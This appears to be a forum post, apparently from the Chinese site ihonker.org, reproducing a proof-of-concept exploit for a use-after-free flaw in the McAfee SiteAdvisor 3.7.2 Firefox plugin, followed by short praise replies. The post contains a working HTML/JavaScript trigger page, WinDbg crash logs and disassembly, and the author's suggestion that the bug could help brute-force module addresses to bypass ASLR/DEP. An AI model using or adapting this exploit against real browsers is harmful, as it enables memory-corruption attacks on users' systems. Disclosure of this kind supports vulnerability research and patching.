McAfee SiteAdvisor 3.7.2 (firefox) Use After Free PoC
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<meta http-equiv="content-type" content="text/html; charset=windows-1250">
<meta name="generator" content="PSPad editor, www.pspad.com">
<title>McAfee SiteAdvisor 3.7.2 for firefox Use After Free Poc</title>
</head>
<body>
<script>
/*
Title: McAfee SiteAdvisor 3.7.2 (firefox) Use After Free
Author: Marcin Ressel
Twitter: https://twitter.com/m_ressel
NPMcFFPlg32.dll
McAfee SiteAdvisor 3.7.2
Tested on: Windows 8.1 (x64) and firefox 38.0.5
Homepage: https://www.siteadvisor.com/
Note: this vlun potentiali give us posibility to bruteforce base modules in memory
to bypass ASLR/DEP because the bug doesn't have negative impact to webbrowser proces
i mean firefox will not crash after trigger uaf i McAfee
0:107> !gflag
Current NtGlobalFlag contents: 0x02001800
htg - Enable heap tagging
ust - Create user mode stack trace database
hpa - Place heap allocations at ends of pages
0:107> g
(1d68.1b54): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=24b9efec ebx=00000000 ecx=00000000 edx=003bf030 esi=1a978ff0 edi=00000001
eip=6f404391 esp=003bf014 ebp=003bf054 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
NPMcFFPlg32!CreateFFScriptable+0x141:
6f404391 8b4008 mov eax,dword ptr ds:002b:24b9eff4=????????
...
6f40437a 8b02 mov eax,dword ptr
6f40437c 85c0 test eax,eax
6f40437e 7402 je NPMcFFPlg32!CreateFFScriptable+0x132 (6f404382)
6f404380 8b00 mov eax,dword ptr
6f404382 8b4808 mov ecx,dword ptr
6f404385 8b4004 mov eax,dword ptr
6f404388 49 dec ecx
6f404389 234a08 and ecx,dword ptr
6f40438c 8b0488 mov eax,dword ptr
6f40438f 8b00 mov eax,dword ptr
6f404391 8b4008 mov eax,dword ptr ds:002b:24b9eff4=????????
6f404394 eb45 jmp NPMcFFPlg32!CreateFFScriptable+0x18b (6f4043db)
6f404396 8d45d0 lea eax,
6f404399 50 push eax
6f40439a e8d10e0000 call NPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
6f40439f 8bd0 mov edx,eax
6f4043a1 8b02 mov eax,dword ptr
6f4043a3 85c0 test eax,eax
6f4043a5 7402 je NPMcFFPlg32!CreateFFScriptable+0x159 (6f4043a9)
6f4043a7 8b00 mov eax,dword ptr
6f4043a9 8b4808 mov ecx,dword ptr
6f4043ac 8b4004 mov eax,dword ptr
6f4043af 49 dec ecx
6f4043b0 234a08 and ecx,dword ptr
6f4043b3 8b3488 mov esi,dword ptr
6f4043b6 8d45c4 lea eax,
6f4043b9 50 push eax
6f4043ba e8b10e0000 call NPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
6f4043bf 8bd0 mov edx,eax
...
*/
var win = null;
function crash()
{
var doc = win.document;
var obj = doc;
win.close();
for(var p in obj)
{
if(typeof obj == 'string')
{
try{ obj = "CCCC"; }catch(err){}
}
}
}
win = window.open('data:text/html,','','width=20,height=20'); //you need disable popupBlocker
win.onload = crash;
</script>
</body>
</html> 感谢楼主的分享~ 支持中国红客联盟(ihonker.org) 大力支持楼主的分享!http://www.freeimagehost.info/files/img/user_uploads/hq2eyn0mbok1298701.gif 学习学习技术,加油! 支持中国红客联盟(ihonker.org) 还是不错的哦,顶了 支持中国红客联盟(ihonker.org) 还是不错的哦,顶了 学习学习技术,加油!
页:
[1]
2